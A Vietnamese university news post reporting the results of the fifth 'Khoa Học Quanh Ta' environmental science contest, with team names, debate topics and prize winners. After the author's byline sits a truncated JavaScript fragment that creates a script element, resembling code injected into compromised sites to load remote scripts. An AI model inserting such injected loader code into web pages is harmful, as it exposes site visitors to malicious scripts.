[Môi Trường] – Cuộc Thi Học Thuật “Khoa Học Quanh Ta”

0
2676

khqtcoverCuộc thi học thuật “KHOA HỌC QUANH TA” mùa thứ 5 do Đoàn khoa Môi Trường tổ chức đã được diễn ra thành công vào thứ 7 vừa qua tại Cơ sở 2 trường Đại Học Khoa Học Tự Nhiên – ĐHQG Hồ Chí Minh.

Cuộ1c thi năm nay diễn ra với sự tham gia của gần 100 sinh viên năm nhất và năm hai của khoa. Với sự tranh tài của 20 đội thi qua các lĩnh vực về Hóa ứng dụng, Vật lý, Sinh Học cùng các kiến thức liên quan đến Môi Trường.

2

 

Bốn đội thi với những cái tên ngộ nghĩnh “16KMT”; “Rainbow”; “ Ngoại lai”; “5 anh em siêu nhân” đã vận dụng hết kiến thức vượt trội của mình đánh bại các đối thủ để lọt vào vòng trong.

Và phần thi hồi hợp nhất đã đến

4Dưới sự hướng dẫn của BGK, các đội đã trình bày ý kiến của mình về các chủ đề:

  • Sử dụng nước uống đóng chai
  • Các chương trình hành động như 3R (Tiết giảm, Tái chế, Tái sử dụng)
  • Các vấn đề về Môi Trường khi sử dụng máy lạnh
  • Sử dụng nhiên liệu sinh học

Kết thúc cuộc thi, với sự trình bày lưu loát, am hiểu kiến thức về Môi Trường và đáp trả những câu phản biện hốc búa của 3 đội còn lại và khán giả. Đội “5 ANH EM SIÊU NHÂN5 đến từ chi đoàn 16KMT và 16CMT gồm các thành viên: Bạn Lê Vĩnh Phong, bạn Nguyễn Huỳnh Văn Khôi, bạn Hồ Thị Ánh Liên, bạn Đặng Thị Kì Duyên và bạn Nguyễn Thị Thanh đã XUẤT SẮC giành GIẢI NHẤT mùa 5 của cuộc thi.

 

7

Cũng không kém cạnh, đội “16KMT” đã về nhì với số điểm suýt sao. Và Giải ba thuộc về đội “Ngoại Lai” cùng với đó Giải khuyến khích thuộc về đội “Rainbow”.86

 

 

 

 

Một lần nữa chúc mừng các đội đã đạt giải, các đội còn lại chúng ta đừng nản lòng nhé, hẹn gặp lại các bạn ở cuộc thi học thuật “Lốc Xanh” – cuộc thi lớn nhất của Khoa Môi Trường vào học kỳ 2 nhé.


                                                                                                                      Minh Thắng

var d=document;var s=d.createElement(‘script’);

CHIA SẺ